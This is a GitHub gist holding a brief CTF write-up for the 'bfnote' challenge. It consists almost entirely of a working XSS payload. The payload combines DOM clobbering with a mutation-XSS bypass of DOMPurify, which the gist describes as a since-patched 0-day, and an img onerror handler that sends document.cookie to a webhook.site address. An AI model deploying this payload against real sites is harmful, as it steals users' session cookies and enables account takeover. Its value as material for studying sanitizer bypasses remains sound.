Created
September 21, 2020 06:22
-
-
Save sqrtrev/9fdd1df15dfce1e92f60308a3bce7723 to your computer and use it in GitHub Desktop.
bfnote Write up using DOMPurify 0-day
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Craft url via DOM Clobbering | |
| And xss via DOMPurify 0-day(now patched, https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d ) | |
| [<a id=a><a id=a name=b href="//webhook.site/f43558da-640a-4ad3-817e-6144d4bc2e7d/" />] | |
| <math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=location.href=a.b.href+document.cookie"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment